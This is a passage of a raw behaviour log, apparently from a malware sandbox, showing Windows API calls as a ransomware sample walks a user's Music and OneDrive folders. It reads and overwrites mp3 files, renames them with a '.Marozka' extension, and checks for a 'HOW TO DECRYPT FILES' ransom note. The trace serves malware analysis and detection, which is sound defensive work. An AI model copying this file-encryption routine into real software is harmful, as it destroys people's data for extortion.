lpBuffer="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\ZN0lb923EkVMtcMKie1\\yU5tCrdB5.mp3.Marozka", lpFilePart=0x0) returned 0x56 [0058.009] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be938) returned 1 [0058.009] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\ZN0lb923EkVMtcMKie1\\yU5tCrdB5.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\nsmyppyczft6c7\\zn0lb923ekvmtcmkie1\\yu5tcrdb5.mp3"), fInfoLevelId=0x0, lpFileInformation=0x5be9b4 | out: lpFileInformation=0x5be9b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x293734e0, ftCreationTime.dwHighDateTime=0x1d4d3cc, ftLastAccessTime.dwLowDateTime=0x4f2c1260, ftLastAccessTime.dwHighDateTime=0x1d4c59e, ftLastWriteTime.dwLowDateTime=0xe54e655a, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x18f40)) returned 1 [0058.009] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be934) returned 1 [0058.009] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\ZN0lb923EkVMtcMKie1\\yU5tCrdB5.mp3" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\nsmyppyczft6c7\\zn0lb923ekvmtcmkie1\\yu5tcrdb5.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\eWEIRMB\\nSmYPpYCZFT6C7\\ZN0lb923EkVMtcMKie1\\yU5tCrdB5.mp3.Marozka" (normalized: "c:\\users\\fd1hvy\\music\\eweirmb\\nsmyppyczft6c7\\zn0lb923ekvmtcmkie1\\yu5tcrdb5.mp3.marozka")) returned 1 [0058.010] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0058.010] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\hRzYd", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\hRzYd", lpFilePart=0x0) returned 0x1b [0058.010] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\hRzYd\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7d7c8 [0058.010] FindNextFileW (in: hFindFile=0xa7d7c8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.010] FindNextFileW (in: hFindFile=0xa7d7c8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.011] FindNextFileW (in: hFindFile=0xa7d7c8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.011] FindNextFileW (in: hFindFile=0xa7d7c8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.011] FindNextFileW (in: hFindFile=0xa7d7c8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0058.011] FindClose (in: hFindFile=0xa7d7c8 | out: hFindFile=0xa7d7c8) returned 1 [0058.011] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0058.011] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0058.011] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0058.011] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\hRzYd", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\hRzYd", lpFilePart=0x0) returned 0x1b [0058.011] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\hRzYd\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7d848 [0058.012] FindNextFileW (in: hFindFile=0xa7d848, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.012] FindNextFileW (in: hFindFile=0xa7d848, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.012] FindNextFileW (in: hFindFile=0xa7d848, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.012] FindNextFileW (in: hFindFile=0xa7d848, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.012] FindNextFileW (in: hFindFile=0xa7d848, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0058.012] FindClose (in: hFindFile=0xa7d848 | out: hFindFile=0xa7d848) returned 1 [0058.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0058.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0058.013] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\hRzYd\\HMjf WbLon.mp3", nBufferLength=0x105, lpBuffer=0x5be45c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\hRzYd\\HMjf WbLon.mp3", lpFilePart=0x0) returned 0x2a [0058.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0058.013] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\hRzYd\\HMjf WbLon.mp3" (normalized: "c:\\users\\fd1hvy\\music\\hrzyd\\hmjf wblon.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0058.013] GetFileType (hFile=0x2e0) returned 0x1 [0058.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0058.013] GetFileType (hFile=0x2e0) returned 0x1 [0058.013] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea9c | out: lpFileSizeHigh=0x5bea9c*=0x0) returned 0xe209 [0058.013] ReadFile (in: hFile=0x2e0, lpBuffer=0x271e3c4, nNumberOfBytesToRead=0xe209, lpNumberOfBytesRead=0x5bea48, lpOverlapped=0x0 | out: lpBuffer=0x271e3c4*, lpNumberOfBytesRead=0x5bea48*=0xe209, lpOverlapped=0x0) returned 1 [0058.014] CloseHandle (hObject=0x2e0) returned 1 [0058.095] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0058.095] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0058.096] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea90 | out: lpFileInformation=0x5bea90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0058.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0058.096] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\hRzYd\\HMjf WbLon.mp3", nBufferLength=0x105, lpBuffer=0x5be448, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\hRzYd\\HMjf WbLon.mp3", lpFilePart=0x0) returned 0x2a [0058.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be98c) returned 1 [0058.096] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\hRzYd\\HMjf WbLon.mp3" (normalized: "c:\\users\\fd1hvy\\music\\hrzyd\\hmjf wblon.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0058.097] GetFileType (hFile=0x2e0) returned 0x1 [0058.097] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be988) returned 1 [0058.097] GetFileType (hFile=0x2e0) returned 0x1 [0058.098] WriteFile (in: hFile=0x2e0, lpBuffer=0x27957f4*, nNumberOfBytesToWrite=0xe210, lpNumberOfBytesWritten=0x5bea3c, lpOverlapped=0x0 | out: lpBuffer=0x27957f4*, lpNumberOfBytesWritten=0x5bea3c*=0xe210, lpOverlapped=0x0) returned 1 [0058.099] CloseHandle (hObject=0x2e0) returned 1 [0058.103] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\hRzYd\\HMjf WbLon.mp3", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\hRzYd\\HMjf WbLon.mp3", lpFilePart=0x0) returned 0x2a [0058.103] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\hRzYd\\HMjf WbLon.mp3.Marozka", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\hRzYd\\HMjf WbLon.mp3.Marozka", lpFilePart=0x0) returned 0x32 [0058.103] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea20) returned 1 [0058.103] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\hRzYd\\HMjf WbLon.mp3" (normalized: "c:\\users\\fd1hvy\\music\\hrzyd\\hmjf wblon.mp3"), fInfoLevelId=0x0, lpFileInformation=0x5bea9c | out: lpFileInformation=0x5bea9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e9f56c0, ftCreationTime.dwHighDateTime=0x1d4d53d, ftLastAccessTime.dwLowDateTime=0x2db54110, ftLastAccessTime.dwHighDateTime=0x1d4c625, ftLastWriteTime.dwLowDateTime=0xe55cb44b, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xe210)) returned 1 [0058.103] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea1c) returned 1 [0058.103] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\hRzYd\\HMjf WbLon.mp3" (normalized: "c:\\users\\fd1hvy\\music\\hrzyd\\hmjf wblon.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\hRzYd\\HMjf WbLon.mp3.Marozka" (normalized: "c:\\users\\fd1hvy\\music\\hrzyd\\hmjf wblon.mp3.marozka")) returned 1 [0058.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0058.104] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v", lpFilePart=0x0) returned 0x28 [0058.104] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7db88 [0058.104] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.105] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.105] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.105] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.105] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.105] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.105] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.106] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0058.106] FindClose (in: hFindFile=0xa7db88 | out: hFindFile=0xa7db88) returned 1 [0058.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0058.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0058.106] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0058.106] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v", lpFilePart=0x0) returned 0x28 [0058.106] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7db88 [0058.106] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.107] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.107] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.107] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.107] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.107] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.108] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0058.108] FindNextFileW (in: hFindFile=0xa7db88, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0058.108] FindClose (in: hFindFile=0xa7db88 | out: hFindFile=0xa7db88) returned 1 [0058.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0058.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0058.108] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\d1mlXpHnQ.mp3", nBufferLength=0x105, lpBuffer=0x5be45c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\d1mlXpHnQ.mp3", lpFilePart=0x0) returned 0x36 [0058.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0058.108] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\d1mlXpHnQ.mp3" (normalized: "c:\\users\\fd1hvy\\music\\l6j-5pvr382xxspz-v\\d1mlxphnq.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0058.108] GetFileType (hFile=0x2e0) returned 0x1 [0058.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0058.109] GetFileType (hFile=0x2e0) returned 0x1 [0058.109] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea9c | out: lpFileSizeHigh=0x5bea9c*=0x0) returned 0x4723 [0058.109] ReadFile (in: hFile=0x2e0, lpBuffer=0x27a5ef0, nNumberOfBytesToRead=0x4723, lpNumberOfBytesRead=0x5bea48, lpOverlapped=0x0 | out: lpBuffer=0x27a5ef0*, lpNumberOfBytesRead=0x5bea48*=0x4723, lpOverlapped=0x0) returned 1 [0058.109] CloseHandle (hObject=0x2e0) returned 1 [0058.184] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0058.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0058.184] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea90 | out: lpFileInformation=0x5bea90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0058.184] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0058.184] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\d1mlXpHnQ.mp3", nBufferLength=0x105, lpBuffer=0x5be448, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\d1mlXpHnQ.mp3", lpFilePart=0x0) returned 0x36 [0058.184] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be98c) returned 1 [0058.184] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\d1mlXpHnQ.mp3" (normalized: "c:\\users\\fd1hvy\\music\\l6j-5pvr382xxspz-v\\d1mlxphnq.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0058.186] GetFileType (hFile=0x2e0) returned 0x1 [0058.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be988) returned 1 [0058.186] GetFileType (hFile=0x2e0) returned 0x1 [0058.186] WriteFile (in: hFile=0x2e0, lpBuffer=0x28090cc*, nNumberOfBytesToWrite=0x4730, lpNumberOfBytesWritten=0x5bea3c, lpOverlapped=0x0 | out: lpBuffer=0x28090cc*, lpNumberOfBytesWritten=0x5bea3c*=0x4730, lpOverlapped=0x0) returned 1 [0058.187] CloseHandle (hObject=0x2e0) returned 1 [0058.188] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\d1mlXpHnQ.mp3", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\d1mlXpHnQ.mp3", lpFilePart=0x0) returned 0x36 [0058.188] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\d1mlXpHnQ.mp3.Marozka", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\d1mlXpHnQ.mp3.Marozka", lpFilePart=0x0) returned 0x3e [0058.188] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea20) returned 1 [0058.189] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\d1mlXpHnQ.mp3" (normalized: "c:\\users\\fd1hvy\\music\\l6j-5pvr382xxspz-v\\d1mlxphnq.mp3"), fInfoLevelId=0x0, lpFileInformation=0x5bea9c | out: lpFileInformation=0x5bea9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa052180, ftCreationTime.dwHighDateTime=0x1d4cc2a, ftLastAccessTime.dwLowDateTime=0x2822f500, ftLastAccessTime.dwHighDateTime=0x1d4c7b3, ftLastWriteTime.dwLowDateTime=0xe5689e51, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x4730)) returned 1 [0058.189] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea1c) returned 1 [0058.189] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\d1mlXpHnQ.mp3" (normalized: "c:\\users\\fd1hvy\\music\\l6j-5pvr382xxspz-v\\d1mlxphnq.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\d1mlXpHnQ.mp3.Marozka" (normalized: "c:\\users\\fd1hvy\\music\\l6j-5pvr382xxspz-v\\d1mlxphnq.mp3.marozka")) returned 1 [0058.189] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\nTScyjUWnHN.mp3", nBufferLength=0x105, lpBuffer=0x5be45c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\nTScyjUWnHN.mp3", lpFilePart=0x0) returned 0x38 [0058.189] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0058.190] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\nTScyjUWnHN.mp3" (normalized: "c:\\users\\fd1hvy\\music\\l6j-5pvr382xxspz-v\\ntscyjuwnhn.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0058.190] GetFileType (hFile=0x2e0) returned 0x1 [0058.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0058.190] GetFileType (hFile=0x2e0) returned 0x1 [0058.190] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea9c | out: lpFileSizeHigh=0x5bea9c*=0x0) returned 0xc58c [0058.190] ReadFile (in: hFile=0x2e0, lpBuffer=0x280dd34, nNumberOfBytesToRead=0xc58c, lpNumberOfBytesRead=0x5bea48, lpOverlapped=0x0 | out: lpBuffer=0x280dd34*, lpNumberOfBytesRead=0x5bea48*=0xc58c, lpOverlapped=0x0) returned 1 [0058.190] CloseHandle (hObject=0x2e0) returned 1 [0058.526] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0058.526] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0058.526] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea90 | out: lpFileInformation=0x5bea90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0058.526] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0058.526] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\nTScyjUWnHN.mp3", nBufferLength=0x105, lpBuffer=0x5be448, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\nTScyjUWnHN.mp3", lpFilePart=0x0) returned 0x38 [0058.526] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be98c) returned 1 [0058.526] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\nTScyjUWnHN.mp3" (normalized: "c:\\users\\fd1hvy\\music\\l6j-5pvr382xxspz-v\\ntscyjuwnhn.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0058.527] GetFileType (hFile=0x2e0) returned 0x1 [0058.528] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be988) returned 1 [0058.528] GetFileType (hFile=0x2e0) returned 0x1 [0058.528] WriteFile (in: hFile=0x2e0, lpBuffer=0x2694fbc*, nNumberOfBytesToWrite=0xc590, lpNumberOfBytesWritten=0x5bea3c, lpOverlapped=0x0 | out: lpBuffer=0x2694fbc*, lpNumberOfBytesWritten=0x5bea3c*=0xc590, lpOverlapped=0x0) returned 1 [0058.529] CloseHandle (hObject=0x2e0) returned 1 [0058.537] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\nTScyjUWnHN.mp3", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\nTScyjUWnHN.mp3", lpFilePart=0x0) returned 0x38 [0058.537] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\nTScyjUWnHN.mp3.Marozka", nBufferLength=0x105, lpBuffer=0x5be56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\nTScyjUWnHN.mp3.Marozka", lpFilePart=0x0) returned 0x40 [0058.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea20) returned 1 [0058.537] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\nTScyjUWnHN.mp3" (normalized: "c:\\users\\fd1hvy\\music\\l6j-5pvr382xxspz-v\\ntscyjuwnhn.mp3"), fInfoLevelId=0x0, lpFileInformation=0x5bea9c | out: lpFileInformation=0x5bea9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2482e830, ftCreationTime.dwHighDateTime=0x1d4c8e2, ftLastAccessTime.dwLowDateTime=0xdfc01b40, ftLastAccessTime.dwHighDateTime=0x1d4c61c, ftLastWriteTime.dwLowDateTime=0xe59d11fd, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xc590)) returned 1 [0058.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea1c) returned 1 [0058.537] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\nTScyjUWnHN.mp3" (normalized: "c:\\users\\fd1hvy\\music\\l6j-5pvr382xxspz-v\\ntscyjuwnhn.mp3"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\l6j-5pvR382XxSpz-v\\nTScyjUWnHN.mp3.Marozka" (normalized: "c:\\users\\fd1hvy\\music\\l6j-5pvr382xxspz-v\\ntscyjuwnhn.mp3.marozka")) returned 1 [0058.538] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0058.538] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\OneDrive", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\OneDrive", lpFilePart=0x0) returned 0x18 [0058.538] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\OneDrive\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7d708 [0058.538] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.538] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0058.539] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0058.539] FindClose (in: hFindFile=0xa7d708 | out: hFindFile=0xa7d708) returned 1 [0058.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0058.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0058.539] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0058.539] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\OneDrive", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: 